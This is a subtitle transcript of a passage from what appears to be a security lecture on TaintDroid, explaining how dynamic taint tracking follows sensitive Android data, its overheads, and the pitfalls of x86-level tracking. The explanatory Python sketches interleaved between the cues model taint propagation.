00:38:00,250 --> 00:38:03,335
in the first place.

783
00:38:03,335 --> 00:38:04,960
In the evaluation
section of the paper,

784
00:38:04,960 --> 00:38:07,240
they discuss some of the
things that they found.

785
00:38:07,240 --> 00:38:10,740
They do find that
Android applications will

786
00:38:10,740 --> 00:38:13,410
try to exfiltrate
data in ways that

787
00:38:13,410 --> 00:38:15,104
were not exposed to the user.

788
00:38:15,104 --> 00:38:17,187
So for example, they will
try to use your location

789
00:38:17,187 --> 00:38:20,090
for advertisements, they
will send your phone number

790
00:38:20,090 --> 00:38:22,080
and things like this
to remote servers.

791
00:38:22,080 --> 00:38:26,170
Once again, it's important to
note that these applications,

792
00:38:26,170 --> 00:38:31,200
typically they weren't
breaking the Android security

793
00:38:31,200 --> 00:38:33,870
model in the sense
that the user had

794
00:38:33,870 --> 00:38:36,350
allowed these applications
with access to the network,

795
00:38:36,350 --> 00:38:37,087
for example.

796
00:38:37,087 --> 00:38:38,670
Or they had allowed
these applications

797
00:38:38,670 --> 00:38:40,760
to have access to things
like a contact list.

798
00:38:40,760 --> 00:38:43,140
However, the
applications did not

799
00:38:43,140 --> 00:38:46,027
expose to the user in the
EULA, in the End User License

800
00:38:46,027 --> 00:38:48,360
Agreement, that hey, I'm going
to take your phone number

801
00:38:48,360 --> 00:38:52,550
and actually send it to
some server in Silk Road 8

802
00:38:52,550 --> 00:38:54,280
or whatever.

803
00:38:54,280 --> 00:38:57,134
That's actually misleading and
deceptive, because most users,

804
00:38:57,134 --> 00:38:58,800
if they'd actually
seen that in the EULA

805
00:38:58,800 --> 00:39:00,299
and they'd known
that was happening,

806
00:39:00,299 --> 00:39:02,827
they might have at least
had a second thought about

807
00:39:02,827 --> 00:39:05,035
whether they want to install
this application or not.

808
00:39:05,035 --> 00:39:08,915
AUDIENCE: Is it reasonable to
guess that even if they put it

809
00:39:08,915 --> 00:39:10,855
in the EULA, that
that's not really worth

810
00:39:10,855 --> 00:39:12,313
it because people
never read those.

811
00:39:12,313 --> 00:39:14,080
PROFESSOR: Yes, it
is, in fact, quite

812
00:39:14,080 --> 00:39:15,770
reasonable to assume that.

813
00:39:15,770 --> 00:39:17,945
So even well trained computer
scientists like myself

814
00:39:17,945 --> 00:39:19,820
do not always check out
the EULA because it's

815
00:39:19,820 --> 00:39:21,670
like, you gotta
have Flappy Birds

816
00:39:21,670 --> 00:39:23,000
or what are you going to do.

817
00:39:23,000 --> 00:39:25,794
I think what is useful,
though, and this

818
00:39:25,794 --> 00:39:27,710
is kind of spiritually
unsatisfying but useful

819
00:39:27,710 --> 00:39:30,081
in practice, is that if
it is put in the EULA,

820
00:39:30,081 --> 00:39:32,330
then maybe there will be
some virtuous individuals who

821
00:39:32,330 --> 00:39:34,050
do actually read the EULA.

822
00:39:34,050 --> 00:39:34,600
AUDIENCE: And they
could tell you like--

823
00:39:34,600 --> 00:39:35,490
PROFESSOR: That's
right, that's right.

824
00:39:35,490 --> 00:39:35,880
AUDIENCE: --don't do that one.

825
00:39:35,880 --> 00:39:37,960
PROFESSOR: Yeah,
Consumer Reports

826
00:39:37,960 --> 00:39:41,380
or some moral equivalent will
say our job is to read EULAs,

827
00:39:41,380 --> 00:39:43,526
and by the way, you
shouldn't download this app.

828
00:39:43,526 --> 00:39:45,820
But you're exactly correct
that relying on users

829
00:39:45,820 --> 00:39:48,345
to read pages of tiny
print is basically--

830
00:39:48,345 --> 00:39:49,470
they're not going to do it.

831
00:39:49,470 --> 00:39:54,260
They're going to hit Next
and then keep on going.

832
00:39:54,260 --> 00:39:57,500
OK, so any questions
up to this point?

833
00:39:57,500 --> 00:40:02,890
I think that the rules
for how information

834
00:40:02,890 --> 00:40:05,650
flows through the system
are fairly straightforward.

835
00:40:05,650 --> 00:40:07,560
So as we were discussing,
it's basically

836
00:40:07,560 --> 00:40:10,400
taint from the right hand
side goes to the left side.

837
00:40:10,400 --> 00:40:13,010
Sometimes, though, these
information flow rules

838
00:40:13,010 --> 00:40:15,140
can have somewhat
counterintuitive results.

839
00:40:15,140 --> 00:40:17,580
So imagine that
an application is

840
00:40:17,580 --> 00:40:22,120
going to implement its
own linked list class.

841
00:40:22,120 --> 00:40:28,550
So it's going to define some
simple class up here called

842
00:40:28,550 --> 00:40:35,020
ListNode and it's going to
have an object field for data.

843
00:40:35,020 --> 00:40:39,528
And then it will have
a ListNode object

844
00:40:39,528 --> 00:40:46,310
which represents the next
thing in the linked list.

845
00:40:46,310 --> 00:40:50,770
Suppose the application
assigned some tainted data

846
00:40:50,770 --> 00:40:54,590
to this field here.

847
00:40:54,590 --> 00:40:57,400
Some sensitive data derived
from a GPS or whatever.

848
00:40:57,400 --> 00:40:59,810
So one question
you might have is

849
00:40:59,810 --> 00:41:03,730
what happens when we calculate
the length for this list.

850
00:41:03,730 --> 00:41:08,660
Should the length of
the list be tainted?

851
00:41:08,660 --> 00:41:10,870
It may strike you as
a bit counterintuitive

852
00:41:10,870 --> 00:41:13,920
that the answer is probably
no, at least in the way

853
00:41:13,920 --> 00:41:15,670
that TaintDroid and a
lot of these systems

854
00:41:15,670 --> 00:41:16,980
define information flow.

855
00:41:16,980 --> 00:41:25,530
So what does it mean to add
a node to the linked list.

856
00:41:25,530 --> 00:41:28,460
It basically means three things.

857
00:41:28,460 --> 00:41:33,450
So the first thing you do
is you allocate a new list

858
00:41:33,450 --> 00:41:37,680
node to contain this new
data that you want to add.

859
00:41:37,680 --> 00:41:45,420
Then the second thing you
do is you assign to the data

860
00:41:45,420 --> 00:41:48,050
field of this new node.

861
00:41:48,050 --> 00:41:50,130
And then the third
thing that you do

862
00:41:50,130 --> 00:41:57,140
is you do some type of patch
up of the next pointers

863
00:41:57,140 --> 00:42:02,380
to actually splice the
node into the list.

864
00:42:02,380 --> 00:42:05,710
What's interesting is that
this step here doesn't actually

865
00:42:05,710 --> 00:42:08,960
involve the data field at all.

866
00:42:08,960 --> 00:42:10,840
Just looking at
these next values.

867
00:42:10,840 --> 00:42:14,820
Right, so what's interesting
is that since only these data

868
00:42:14,820 --> 00:42:20,000
objects are tainted, how we
calculate the length of a list.

869
00:42:20,000 --> 00:42:21,701
We basically start
from some head node

870
00:42:21,701 --> 00:42:23,200
and we traverse
these next pointers,

871
00:42:23,200 --> 00:42:25,050
and we count how
many we traverse.

872
00:42:25,050 --> 00:42:27,383
So that algorithm is not going
to touch the tainted data

873
00:42:27,383 --> 00:42:27,920
at all.

874
00:42:27,920 --> 00:42:31,990
So interestingly, even if
you have a linked list that's

875
00:42:31,990 --> 00:42:36,190
filled with tainted
data, then just

876
00:42:36,190 --> 00:42:38,410
calculating the
length of that list

877
00:42:38,410 --> 00:42:41,360
won't actually result in
the generation of a value

878
00:42:41,360 --> 00:42:43,630
that is tainted at all.

879
00:42:43,630 --> 00:42:45,200
So does that make sense?

880
00:42:45,200 --> 00:42:47,772
That may seem a little
bit counterintuitive,

881
00:42:47,772 --> 00:42:49,230
and this is one of
the reasons why,

882
00:42:49,230 --> 00:42:51,521
for example, like when we
were talking about the array,

883
00:42:51,521 --> 00:42:52,080
for example.

884
00:42:52,080 --> 00:42:54,410
They say array.length,
I'm not going

885
00:42:54,410 --> 00:42:56,110
to generate any taint for that.

886
00:42:56,110 --> 00:43:00,390
It's because of
reasons like this.
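
A minimal sketch of the linked list example, assuming a toy model in which every value carries its own taint tag. The names `Tagged`, `TAINT_GPS`, and `length` are made up for illustration and are not TaintDroid's API. Counting nodes only follows `next` pointers, so the tainted `data` fields never flow into the count.

```python
from dataclasses import dataclass
from typing import Optional

TAINT_NONE = 0x0
TAINT_GPS = 0x1  # hypothetical tag bit for location data


@dataclass
class Tagged:
    """A value paired with a taint tag (a bit vector of sources)."""
    value: object
    tag: int = TAINT_NONE


@dataclass
class ListNode:
    data: Tagged                       # may hold tainted data
    next: Optional["ListNode"] = None  # plain reference, untainted in this model


def length(head):
    """Count nodes by following next pointers only."""
    count = Tagged(0)                  # a constant starts out untainted
    node = head
    while node is not None:
        # count = count + 1: the tag is the OR of the operand tags,
        # and both operands (count and the constant 1) are untainted.
        count = Tagged(count.value + 1, count.tag | TAINT_NONE)
        node = node.next               # node.data is never read
    return count


head = ListNode(Tagged("42.36,-71.09", TAINT_GPS),
                ListNode(Tagged("42.37,-71.11", TAINT_GPS)))
n = length(head)
print(n.value, hex(n.tag))
```

Every element of the list is tainted here, yet the length comes back with an empty tag, which is the same reasoning behind leaving array.length untainted.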

887
00:43:00,390 --> 00:43:04,950
If you wanted a
stronger assurance

888
00:43:04,950 --> 00:43:06,810
about-- not stronger assurance.

889
00:43:06,810 --> 00:43:08,730
But if you actually
want to calculate

890
00:43:08,730 --> 00:43:14,620
the length of the list to
generate a tainted value,

891
00:43:14,620 --> 00:43:16,650
we could imagine that
your implementation, it's

892
00:43:16,650 --> 00:43:19,857
a bit goofy, but you can
just decide to touch data

893
00:43:19,857 --> 00:43:21,940
for no real semantic reason
other than to generate

894
00:43:21,940 --> 00:43:24,156
taint in the resulting length.
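
The "goofy" variant could be sketched like this, under the assumption of a toy model where each node stores a tag next to its data. `Node`, `data_tag`, and `tainted_length` are hypothetical names. The loop reads the data tag for no semantic reason other than to fold it into the tag of the result.

```python
TAINT_GPS = 0x1  # hypothetical tag bit for location data


class Node:
    def __init__(self, data, data_tag, next=None):
        self.data = data
        self.data_tag = data_tag  # taint tag stored next to the data
        self.next = next


def tainted_length(head):
    """Return (length, tag), where the tag is the union of all data tags."""
    count, count_tag = 0, 0
    node = head
    while node is not None:
        # Touch the data's tag only so that taint flows into the count.
        count_tag |= node.data_tag
        count += 1
        node = node.next
    return count, count_tag


head = Node("42.36,-71.09", TAINT_GPS, Node("home", 0))
print(tainted_length(head))
```

One tainted element is enough to taint the length, because tags are combined with a bitwise OR.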

895
00:43:24,156 --> 00:43:26,280
Or, as I'll discuss towards
the end of the lecture,

896
00:43:26,280 --> 00:43:27,780
you could actually
use a language

897
00:43:27,780 --> 00:43:31,740
which allows you the
programmer to define

898
00:43:31,740 --> 00:43:33,780
your own types of taint.

899
00:43:33,780 --> 00:43:36,530
And then you can actually
define your own policies

900
00:43:36,530 --> 00:43:38,280
for things like this.

901
00:43:38,280 --> 00:43:41,146
One nice thing about TaintDroid
is that you as a developer,

902
00:43:41,146 --> 00:43:42,520
you don't have to
label anything.

903
00:43:42,520 --> 00:43:44,144
TaintDroid basically
does that for you.

904
00:43:44,144 --> 00:43:46,767
It says here's all the sensitive
stuff that can be a source,

905
00:43:46,767 --> 00:43:48,850
here's all the sensitive
stuff that can be a sink.

906
00:43:48,850 --> 00:43:51,104
You as a developer,
you're ready to go.

907
00:43:51,104 --> 00:43:53,020
But if you want that finer-grained control,
pointer to be controlled,

908
00:43:53,020 --> 00:43:56,700
you might have to build some
of the policies yourself.

909
00:43:56,700 --> 00:44:04,364
All right, so in terms
of performance overhead

910
00:44:04,364 --> 00:44:06,030
of TaintDroid, what
does that look like?

911
00:44:08,550 --> 00:44:11,710
The overheads actually seem
to be pretty reasonable.

912
00:44:11,710 --> 00:44:16,006
So there's going to be
memory overhead, and that's

913
00:44:16,006 --> 00:44:18,070
the memory overhead,
essentially,

914
00:44:18,070 --> 00:44:21,730
of storing all of
these taint tags.

915
00:44:21,730 --> 00:44:27,320
And so there's going
to be CPU overhead,

916
00:44:27,320 --> 00:44:32,290
and this is basically to
assign, propagate, and check

917
00:44:32,290 --> 00:44:34,720
those taint tags.

918
00:44:34,720 --> 00:44:36,600
And that's because of
overhead like here.

919
00:44:36,600 --> 00:44:38,640
So in the interpreter
for the Dalvik VM,

920
00:44:38,640 --> 00:44:40,470
we're actually doing
additional work.

921
00:44:40,470 --> 00:44:44,080
So looking at the source,
looking at this 32 bit taint

922
00:44:44,080 --> 00:44:47,209
information, we're
doing the or operations

923
00:44:47,209 --> 00:44:49,250
that we discussed before,
and so on and so forth.

924
00:44:49,250 --> 00:44:52,260
So that's
computational overhead.
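
Roughly, the extra work per interpreted instruction looks like the sketch below. This is a toy register machine, not the Dalvik interpreter, and `Frame`, `op_const`, `op_move`, and `op_add` are hypothetical names. Each register has a 32-bit tag, and the destination's tag is the bitwise OR of the source tags.

```python
TAINT_LOCATION = 0x1  # hypothetical tag bits, one per sensitive source
TAINT_CONTACTS = 0x2


class Frame:
    """Registers for one method call, each with a parallel 32-bit taint tag."""
    def __init__(self, nregs):
        self.values = [0] * nregs
        self.tags = [0] * nregs


def op_const(f, dst, c):
    f.values[dst] = c
    f.tags[dst] = 0                       # constants carry no taint


def op_move(f, dst, src):
    f.values[dst] = f.values[src]
    f.tags[dst] = f.tags[src]             # right-hand side taints the left


def op_add(f, dst, a, b):
    f.values[dst] = f.values[a] + f.values[b]
    f.tags[dst] = f.tags[a] | f.tags[b]   # union of both operands' taint


frame = Frame(4)
frame.values[0], frame.tags[0] = 37, TAINT_LOCATION
frame.values[1], frame.tags[1] = 5, TAINT_CONTACTS
op_add(frame, 2, 0, 1)    # r2 = r0 + r1, tagged with both sources
op_const(frame, 3, 7)
op_add(frame, 3, 3, 3)    # r3 = 7 + 7, still untainted
print(frame.values[2], hex(frame.tags[2]), frame.values[3], hex(frame.tags[3]))
```

The tag update is one extra load, OR, and store per instruction, which is cheap individually but paid on every step of the interpreter loop.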

925
00:44:52,260 --> 00:44:54,610
These overheads actually
seem to be pretty moderate.

926
00:44:54,610 --> 00:45:01,540
So for memory, the authors
report about 3% to 5%

927
00:45:01,540 --> 00:45:03,910
in terms of the
extra RAM space you

928
00:45:03,910 --> 00:45:06,015
need to store those taint tags.

929
00:45:06,015 --> 00:45:07,550
So that's not too bad.

930
00:45:07,550 --> 00:45:11,460
The CPU overhead is higher,
which I think makes sense.

931
00:45:11,460 --> 00:45:18,610
They report somewhere between,
let's say, 3% and about 29% CPU

932
00:45:18,610 --> 00:45:19,661
overhead.

933
00:45:19,661 --> 00:45:22,160
And the reason why I think it's
reasonable to see why that's

934
00:45:22,160 --> 00:45:27,080
higher is because you can
imagine that every time you

935
00:45:27,080 --> 00:45:28,850
step into the
interpreter loop, you're

936
00:45:28,850 --> 00:45:31,440
having to look at these
tags and do some operations.

937
00:45:31,440 --> 00:45:34,850
So even though it is all
these bitwise operations,

938
00:45:34,850 --> 00:45:36,690
you have to do
that all the time.

939
00:45:36,690 --> 00:45:39,960
So that seems like it's going to
get painful, whereas basically,

940
00:45:39,960 --> 00:45:43,630
the overhead for this, OK, so
you put a couple extra integers

941
00:45:43,630 --> 00:45:44,740
in memory somewhere.

942
00:45:44,740 --> 00:45:48,340
That doesn't seem,
maybe, too bad.

943
00:45:48,340 --> 00:45:53,570
Even on its high end, 29%,
in and of itself maybe that's OK,

944
00:45:53,570 --> 00:45:56,664
because Silicon Valley
keeps telling us

945
00:45:56,664 --> 00:45:59,080
that we need phones that have
like quad cores and whatnot,

946
00:45:59,080 --> 00:46:01,329
so probably have a lot of
spare cycles sitting around.

947
00:46:01,329 --> 00:46:03,550
So maybe that's not
all that crushing.

948
00:46:03,550 --> 00:46:06,750
Although there might be a
problem with battery life.

949
00:46:06,750 --> 00:46:08,567
So even if you have
these extra cores,

950
00:46:08,567 --> 00:46:10,900
you might not want your phone
getting hot in your pocket

951
00:46:10,900 --> 00:46:12,950
as you're just sitting
there, just sort

952
00:46:12,950 --> 00:46:15,100
of churning and calculating
some of this stuff.

953
00:46:15,100 --> 00:46:17,400
I think for here,
the main issue here

954
00:46:17,400 --> 00:46:19,400
would be if this is
bad for your battery.

955
00:46:19,400 --> 00:46:21,235
If it's not bad
for your battery,

956
00:46:21,235 --> 00:46:23,985
then probably even at that high
end, that may not be that bad.

957
00:46:28,800 --> 00:46:30,860
So that is essentially
an overview

958
00:46:30,860 --> 00:46:32,785
of how TaintDroid works.

959
00:46:32,785 --> 00:46:34,564
Any more questions before we--

960
00:46:34,564 --> 00:46:37,516
AUDIENCE: Do you tag
something that also

961
00:46:37,516 --> 00:46:39,484
has been there all the time?

962
00:46:39,484 --> 00:46:41,698
Do you tag every
variable, or only

963
00:46:41,698 --> 00:46:43,420
tag the ones that have this?

964
00:46:43,420 --> 00:46:46,840
PROFESSOR: Yes, so you
basically tag everything.

965
00:46:46,840 --> 00:46:52,518
So in theory, there's
nothing that prevents you

966
00:46:52,518 --> 00:46:56,917
from not allocating any taint
information for stuff that

967
00:46:56,917 --> 00:46:57,750
has no taint at all.

968
00:46:57,750 --> 00:47:00,170
I think the problem,
then, with it--

969
00:47:00,170 --> 00:47:04,545
then once something gains
even one bit of taint,

970
00:47:04,545 --> 00:47:07,770
then you have to do dynamic
sort of layout changes.

971
00:47:07,770 --> 00:47:11,670
So what if on the stack,
this local here, then it

972
00:47:11,670 --> 00:47:13,670
had a taint, so now you're
allocating with this,

973
00:47:13,670 --> 00:47:14,303
and it does get taint.

974
00:47:14,303 --> 00:47:16,520
Or you have that extra
taint flag live on the heap,

975
00:47:16,520 --> 00:47:18,020
and you're going to see
how it rewrites the stack,

976
00:47:18,020 --> 00:47:20,140
and then someone made
your code-- so we're

977
00:47:20,140 --> 00:47:21,306
going to see how that works.

978
00:47:21,306 --> 00:47:25,210
So in practice, you typically use
something like shadow memory,

979
00:47:25,210 --> 00:47:29,800
so every byte in the
application is backed up

980
00:47:29,800 --> 00:47:32,060
by some byte of extra
information somewhere.

981
00:47:32,060 --> 00:47:35,060
And in the case of TaintDroid,
that shadowing actually

982
00:47:35,060 --> 00:47:37,060
lives alongside of the
actual variable itself.
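
A sketch of that "tag lives next to the variable" layout, assuming a flat array of words in which slot i's value sits at index 2*i and its tag at index 2*i + 1. `InterleavedStack` is a hypothetical name and the real layout has more detail than this.

```python
TAINT_GPS = 0x1  # hypothetical tag bit


class InterleavedStack:
    """Stack slots laid out as [value0, tag0, value1, tag1, ...]."""
    def __init__(self, nslots):
        self.words = [0] * (2 * nslots)   # every slot gets a tag word up front

    def write(self, slot, value, tag=0):
        self.words[2 * slot] = value
        self.words[2 * slot + 1] = tag

    def read(self, slot):
        return self.words[2 * slot], self.words[2 * slot + 1]


stack = InterleavedStack(3)
stack.write(0, 7)                  # untainted local
stack.write(1, 4236, TAINT_GPS)    # tainted local
print(stack.words)
```

Because the tag word is always allocated, a variable that becomes tainted later needs no layout change; the cost is the extra word for variables that never carry taint.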

983
00:47:37,060 --> 00:47:40,060
Anyone have another question?

984
00:47:40,060 --> 00:47:41,860
OK.

985
00:47:41,860 --> 00:47:43,302
Cool.

986
00:47:43,302 --> 00:47:46,720
This system essentially
tracks information

987
00:47:46,720 --> 00:47:53,840
at the level of these high
level Dalvik VM instructions.

988
00:47:53,840 --> 00:47:59,310
So one thing you might
think to yourself

989
00:47:59,310 --> 00:48:11,230
is, could we track taint at
the level of x86 instructions

990
00:48:11,230 --> 00:48:14,087
or the ARM instructions.

991
00:48:17,797 --> 00:48:19,255
One reason why that
might be useful

992
00:48:19,255 --> 00:48:22,470
is because then
we could actually

993
00:48:22,470 --> 00:48:26,650
understand how information flows
through arbitrary applications,

994
00:48:26,650 --> 00:48:30,160
not just ones that are running
inside this tricked out

995
00:48:30,160 --> 00:48:33,270
VM that requires you to run
Java and so on and so forth.

996
00:48:33,270 --> 00:48:37,367
So why not track
taint at that level.

997
00:48:37,367 --> 00:48:39,200
It turns out that you
can, in fact, do that.

998
00:48:39,200 --> 00:48:42,100
So there are projects that have
looked at tracking taint

999
00:48:42,100 --> 00:48:43,960
at this low level.

1000
00:48:43,960 --> 00:48:46,768
What's nice is that you maybe
get that increased coverage.

1001
00:48:46,768 --> 00:48:48,724
You don't throw a
line into [INAUDIBLE]

1002
00:48:48,724 --> 00:48:51,560
for how, for example, Java
code interacts with native code

1003
00:48:51,560 --> 00:48:52,060
methods.

1004
00:48:52,060 --> 00:48:54,015
It's all eventually
going to result down

1005
00:48:54,015 --> 00:48:56,324
to x86 instructions
executed, so that

1006
00:48:56,324 --> 00:48:58,740
removes a lot of the manual
effort that you as a developer

1007
00:48:58,740 --> 00:49:01,819
have to do to sort of understand
the taint semantics if you

1008
00:49:01,819 --> 00:49:02,610
use native methods.

1009
00:49:02,610 --> 00:49:07,210
But the problem with that, if
we track at this low level,

1010
00:49:07,210 --> 00:49:11,540
it can be very
expensive to do this.

1011
00:49:11,540 --> 00:49:17,460
You can also get a lot
of false positives.

1012
00:49:17,460 --> 00:49:20,160
So in addition
to the expense,

1013
00:49:20,160 --> 00:49:24,217
there's also this
issue of correctness.

1014
00:49:26,750 --> 00:49:31,050
As you may know, x86 is
an adversarially complex

1015
00:49:31,050 --> 00:49:32,690
instruction set.

1016
00:49:32,690 --> 00:49:34,830
There's all kinds of crazy
things that it can do.

1017
00:49:34,830 --> 00:49:38,540
I don't know if you've ever
seen an x86 instruction manual,

1018
00:49:38,540 --> 00:49:39,810
they're huge.

1019
00:49:39,810 --> 00:49:42,730
So they'll have one huge
manual that's this thick,

1020
00:49:42,730 --> 00:49:45,710
and then it'll say this is
instructions whose letters

1021
00:49:45,710 --> 00:49:48,435
start with M through P, and
there'll be this full on series

1022
00:49:48,435 --> 00:49:50,172
about that.

1023
00:49:50,172 --> 00:49:52,270
So it's actually
pretty tricky to think

1024
00:49:52,270 --> 00:49:54,295
about what it means to
actually track taint

1025
00:49:54,295 --> 00:49:57,130
at the level of x86 instructions.

1026
00:49:57,130 --> 00:49:59,605
Because even seemingly
simple instructions,

1027
00:49:59,605 --> 00:50:02,080
like add,
they're setting

1028
00:50:02,080 --> 00:50:04,060
all types of internal
processor registers

1029
00:50:04,060 --> 00:50:05,840
and flags and things like that.

1030
00:50:05,840 --> 00:50:08,400
So it's very difficult to
describe in the first place.

1031
00:50:08,400 --> 00:50:12,220
If you could do that, it's
also oftentimes very expensive.

1032
00:50:12,220 --> 00:50:16,547
You're sort of looking at things
at a very, very low level.

1033
00:50:16,547 --> 00:50:18,310
So the amount of state
you have to track

1034
00:50:18,310 --> 00:50:19,914
might get very
large very quickly.

1035
00:50:19,914 --> 00:50:22,710
It might be a very expensive
computational cost.

1036
00:50:22,710 --> 00:50:25,090
Then there's this issue
of false positives.

1037
00:50:25,090 --> 00:50:29,180
This is actually
pretty devastating.

1038
00:50:29,180 --> 00:50:34,576
You can get into bad
problems if you ever

1039
00:50:34,576 --> 00:50:42,729
have kernel data that
improperly gets tainted.

1040
00:50:47,719 --> 00:50:52,960
And if this happens, maybe
because your infrastructure's

1041
00:50:52,960 --> 00:50:56,034
trying to be ultraconservative,
it doesn't want

1042
00:50:56,034 --> 00:50:57,450
to miss anything,
so it says well,

1043
00:50:57,450 --> 00:50:59,480
I'm going to err on
the side of security.

1044
00:50:59,480 --> 00:51:02,740
And I'm going to taint some
of this kernel data structure,

1045
00:51:02,740 --> 00:51:07,470
then what you get here is
this exciting term they

1046
00:51:07,470 --> 00:51:09,190
call taint explosion.

1047
00:51:09,190 --> 00:51:11,730
What this basically means
is that at a certain point,

1048
00:51:11,730 --> 00:51:13,780
there are certain things that
if they end up getting tainted,

1049
00:51:13,780 --> 00:51:15,446
they're involved in
so many calculations

1050
00:51:15,446 --> 00:51:18,342
that essentially everything
in your program gets polluted.

1051
00:51:18,342 --> 00:51:20,550
It's like one of these things
in Dungeons and Dragons

1052
00:51:20,550 --> 00:51:22,900
where you touch this
evil thing and eventually

1053
00:51:22,900 --> 00:51:26,395
death spreads
throughout your body.

1054
00:51:26,395 --> 00:51:29,624
This is very bad, because
if you can't tightly

1055
00:51:29,624 --> 00:51:32,140
constrain the way that taint
flows through the system,

1056
00:51:32,140 --> 00:51:34,510
then eventually what's
going to end up happening

1057
00:51:34,510 --> 00:51:34,984
is that you let this
run for a while,

1058
00:51:34,984 --> 00:51:36,984
the system's going to say
you can't do anything.

1059
00:51:36,984 --> 00:51:38,964
You can't send anything
over the network,

1060
00:51:38,964 --> 00:51:40,672
you can't display
anything on the screen,

1061
00:51:40,672 --> 00:51:42,270
because everything
in your system

1062
00:51:42,270 --> 00:51:44,700
seems like it's been tainted
by some sensitive data,

1063
00:51:44,700 --> 00:51:47,350
even if that's not the case.

1064
00:51:47,350 --> 00:51:53,980
One way that this can
happen is if somehow

1065
00:51:53,980 --> 00:51:59,700
the stack pointer or the
base pointer get tainted.

1066
00:52:03,780 --> 00:52:06,819
If this happens, you're
probably in a world of hurt.

1067
00:52:06,819 --> 00:52:09,540
You can imagine that all
of the instructions in x86,

1068
00:52:09,540 --> 00:52:15,100
for example, that access the
stack, they all go through ESP.

1069
00:52:15,100 --> 00:52:19,130
So if the stack register gets
tainted somehow, that's bad.

1070
00:52:19,130 --> 00:52:20,910
If the base pointer
register gets bad,

1071
00:52:20,910 --> 00:52:24,065
a lot of times when you want
your code to access

1072
00:52:24,065 --> 00:52:28,238
local variables, it has
to go through EBP indirectly.

1073
00:52:28,238 --> 00:52:31,070
So if anybody ever touches
those in terms of taint,

1074
00:52:31,070 --> 00:52:32,355
it's basically game over.
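
A toy illustration of why a tainted stack pointer is game over, assuming a conservative policy in which a load or store is tainted whenever the address register is tainted. `Machine`, `load`, and `store` are hypothetical names; this is not how any particular x86 tracker is implemented.

```python
SECRET = 0x1  # hypothetical tag bit


class Machine:
    """Tracks only taint tags: one per register, one per memory address."""
    def __init__(self):
        self.reg_tag = {"esp": 0, "ebp": 0, "eax": 0, "ebx": 0, "ecx": 0}
        self.mem_tag = {}

    def load(self, dst, base, addr):
        # Conservative: the result is tainted if the memory word OR the
        # register used to compute the address is tainted.
        self.reg_tag[dst] = self.mem_tag.get(addr, 0) | self.reg_tag[base]

    def store(self, src, base, addr):
        self.mem_tag[addr] = self.reg_tag[src] | self.reg_tag[base]


m = Machine()
m.load("eax", "esp", 0x1000)
before = m.reg_tag["eax"]          # clean stack access stays clean

m.reg_tag["esp"] = SECRET          # the stack pointer picks up taint once
m.load("ebx", "esp", 0x1004)       # every later stack access inherits it
m.store("ebx", "esp", 0x1008)
m.load("ecx", "esp", 0x1008)
print(before, m.reg_tag["ebx"], m.mem_tag[0x1008], m.reg_tag["ecx"])
```

After the single assignment to esp's tag, every value that passes through the stack comes out tainted, even though none of it was derived from sensitive data.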

1075
00:52:32,355 --> 00:52:33,980
So there's a link in
the lecture that's

1076
00:52:33,980 --> 00:52:36,063
about a paper that
acknowledges some of this stuff

1077
00:52:36,063 --> 00:52:39,540
and basically says that we have
to be very careful when we do

1078
00:52:39,540 --> 00:52:42,274
taint tracking at this low level
because very quickly, if you're

1079
00:52:42,274 --> 00:52:44,190
looking at how this works
in the Linux kernel,

1080
00:52:44,190 --> 00:52:46,564
there are certain optimizations
the Linux kernel would do

1081
00:52:46,564 --> 00:52:49,054
to make its code fast, but
will result, unintentionally,

1082
00:52:49,054 --> 00:52:51,960
in the base pointer or the
stack pointer getting tainted.

1083
00:52:51,960 --> 00:52:54,407
And once that happens, you
can't really do anything useful

1084
00:52:54,407 --> 00:52:55,698
with the taint tracking system.

1085
00:52:55,698 --> 00:53:01,316
AUDIENCE: So how do you do
this [INAUDIBLE] programs?

1086
00:53:01,316 --> 00:53:04,120
It seems like you have all
these register files in the CPU.

1087
00:53:04,120 --> 00:53:06,210
PROFESSOR: Yeah, so great.

1088
00:53:06,210 --> 00:53:08,261
So all those register
files, it harks back

1089
00:53:08,261 --> 00:53:09,260
to the correctness case.

1090
00:53:09,260 --> 00:53:11,362
So unless you are
very, very good

1091
00:53:11,362 --> 00:53:12,790
at understanding
x86 architecture,

1092
00:53:12,790 --> 00:53:14,694
there are going to be
things that you miss.

1093
00:53:14,694 --> 00:53:17,550
In terms of computation
level, how do you actually

1094
00:53:17,550 --> 00:53:18,260
do this thing.

1095
00:53:18,260 --> 00:53:22,307
There's this-- I think
the most popular way,

1096
00:53:22,307 --> 00:53:23,640
and I could be wrong about this.

1097
00:53:23,640 --> 00:53:25,406
So when I say it's
popular, the way I

1098
00:53:25,406 --> 00:53:28,010
know about, because I'm a
knowledge [INAUDIBLE], right.

1099
00:53:28,010 --> 00:53:31,050
There's this system
emulator called Bochs,

1100
00:53:31,050 --> 00:53:35,552
I think it's spelled like this.

1101
00:53:35,552 --> 00:53:37,010
They actually have
something called

1102
00:53:37,010 --> 00:53:43,600
TaintBochs, which actually does
x86-level information flow.

1103
00:53:43,600 --> 00:53:45,390
And it's actually
an interpreter,

1104
00:53:45,390 --> 00:53:47,840
you can think of it as.

1105
00:53:47,840 --> 00:53:50,166
So it's going to take
your entire OS and all

1106
00:53:50,166 --> 00:53:51,970
your applications,
and it's going

1107
00:53:51,970 --> 00:53:55,450
to look at each x86
instruction and try to simulate

1108
00:53:55,450 --> 00:53:57,230
what the hardware would do.

1109
00:53:57,230 --> 00:53:59,090
So you can imagine this
is very, very slow.

1110
00:53:59,090 --> 00:54:00,940
What's nice about that is you
don't require any hardware

1111
00:54:00,940 --> 00:54:03,290
support, and then it's
relatively straightforward

1112
00:54:03,290 --> 00:54:06,794
to tweak your software
model of how things work,

1113
00:54:06,794 --> 00:54:08,210
if you discovered
that you weren't

1114
00:54:08,210 --> 00:54:10,460
tracking some register
files or something like that.

1115
00:54:10,460 --> 00:54:14,114
AUDIENCE: So the ideal solution
would be architectural support.

1116
00:54:14,114 --> 00:54:15,715
PROFESSOR: Yeah,
so there have been

1117
00:54:15,715 --> 00:54:17,240
techniques to do that, too.

1118
00:54:17,240 --> 00:54:22,179
That gets a little bit
subtle because, for example,

1119
00:54:22,179 --> 00:54:23,720
if you look here
you've looked at how

1120
00:54:23,720 --> 00:54:27,488
we've allocated the taint
state next to the variables

1121
00:54:27,488 --> 00:54:28,840
themselves.

1122
00:54:28,840 --> 00:54:31,610
So if you bake in that
support in the hardware,

1123
00:54:31,610 --> 00:54:34,565
it can be very difficult to,
for example, change the way

1124
00:54:34,565 --> 00:54:35,920
you want the layout to work.

1125
00:54:35,920 --> 00:54:37,836
Because then it's like
baked into the silicon.

1126
00:54:37,836 --> 00:54:42,258
You could imagine doing some of
